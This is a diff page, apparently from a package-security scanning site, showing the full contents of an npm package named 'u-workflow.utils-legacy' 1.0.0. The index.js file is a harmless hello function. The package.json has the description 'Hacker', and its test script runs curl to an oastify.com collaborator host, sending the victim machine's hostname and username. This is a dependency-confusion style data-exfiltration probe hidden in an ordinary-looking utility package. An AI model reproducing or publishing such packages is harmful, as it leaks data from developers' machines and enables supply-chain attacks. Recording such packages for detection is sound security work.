u-workflow.utils-legacy 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +7 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ //index.js
2
+
3
+ function helloNpm() {
4
+ return "hello NPM"
5
+ }
6
+
7
+ module.exports = helloNpm
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "u-workflow.utils-legacy",
3
+ "version": "1.0.0",
4
+ "description": "Hacker",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "curl 'http://1acnyprt7dtdfp6xufeskbi6rxxole93.oastify.com/?$(hostname)=$(whoami)'"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }